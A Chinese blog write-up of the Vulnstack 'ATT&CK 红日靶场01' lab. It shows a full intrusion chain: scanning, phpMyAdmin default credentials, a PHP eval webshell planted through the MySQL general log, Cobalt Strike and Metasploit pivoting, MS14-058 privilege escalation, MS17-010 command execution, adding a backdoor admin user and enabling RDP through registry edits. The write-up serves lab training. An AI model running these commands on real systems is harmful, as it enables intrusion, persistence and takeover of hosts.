Featured image of post ATT&CK (红日靶场01)

ATT&CK (红日靶场01)

打靶学习

ATT&CK红队评估(红日靶场一)

靶场下载

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

0X01-主机发现


1
2
3
sudo arp-scan -l
web服务器ip 192.168.20.100
kali攻击机IP 192.168.20.118

0X02-信息收集

1
sudo nmap -sV -p- 192.168.20.100

端口扫描结果

截图


0X03-web渗透

访问web界面

这里直接是探针,试了下数据库连接 root:root 可以连接,函数上 eval函数 显示不支持

截图

目录扫描

1
2

gobuster dir -u http://192.168.20.100/ -w /usr/share/wordlists/dirbuster/commen.txt -x php,zip,txt,html

发现phpmyadmin,尝试 root:root 登录成功

截图

发现yxcms但是数据库查到的密码无法登录后台,插入也不行(有大佬知道怎么操作这里请指点)

截图

sql语句写入木马

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
#查看写入权限 secure_file_prive null就是没有

SHOW GLOBAL VARIABLES LIKE '%secure%';

#查看是否有开启日志记录 会返回是否开启和日志文件路径

SHOW GLOBAL VARIABLES LIKE '%general%';

#开启日志记录

SET GLOBAL general_log = ON

#设置指定日志文件,这样在sql语句中加入php代码就会被记录到test.php中实现shell写入

SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php';

#写入木马
select '<?php eval($_POST["hack"]);?>';

#执行这条语句之后,日志会将select后的查询语句记录进日志,从而让日志变成一个一句话木马
#这里eval函数可以正常连接,不知道上面探针测试结果怎么回事

0X04-后渗透

cobalt strike上线

cs生成exe,蚁剑连接shell后上传运行

上线后发现adminnistrator权限,尝试提权为system,使用 systeminfo查看系统信息发现win7且补丁很少,使用 ms14_058 提权为 system 成功

截图

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

#试着开启3389服务

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

net start termservice

0X05-内网

探测

cs自带的 右键->浏览探测->网络探测&端口扫描 (能看到存活3个主机,一个是已经上线的,都开了445端口,必须尝试 ms17-010

截图

msf 联动轻松访问内网

msf 开启监听

CS 新建 foreign 监听器,IP和port与刚才 msf 使用的一致,然后选中目标机器

右键->凭证提权(spawn)->新建会话->选择刚刚新建的监听器->run

屏幕截图 2024-07-30 173251.png

msf 拿到会话

截图

为了使除了msf的其它工具也能通过cs反弹过来的会话进入内网,msf建立需要建立socks反向代理

首先新建路由

run post/multi/manage/autoroute

查看路由

run autoroute -p

挂起会话,建立socks

1
2
3
4
5
6
7
8
background
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVHOST 127.0.0.1

show options  #这里查看proxy的端口,后面修改/etc/proxychains4.conf 文件内容为对应的 IP:PORT

exploit

修改proxychains4.conf

1
sudo vim /etc/proxychains4.conf #修改文件内容为 msf 设定的 IP:PORT

0X06-ms17-010击穿内网

1
2
3
4
5
6
net view
arp #探测内网存活主机
use post/windows/gather/arp_scanner
set RHOSTS 192.168.52.0/24
set SESSION 1
exploit

截图

1
2
3
4
5
6
7
#查看域信息:
net view
#查看主域信息:
net view /domain
#开始横向渗透控制其它主机
#进行其它内网主机端口探测
sudo proxychains nmap -sS -sV -Pn 192.168.52.138

截图

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#发现445端口尝试永恒之蓝
search ms17-010

use auxiliary/admin/smb/ms17_010_command

set COMMAND net user

set RHOST 192.168.52.141

exploit

#添加用户

net user hack qaz@123 /add


#将添加的用户加入到管理员组

net localgroup administrators hack /add

#试着开启3389服务

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

net start termservice
使用 Hugo 构建
主题 StackJimmy 设计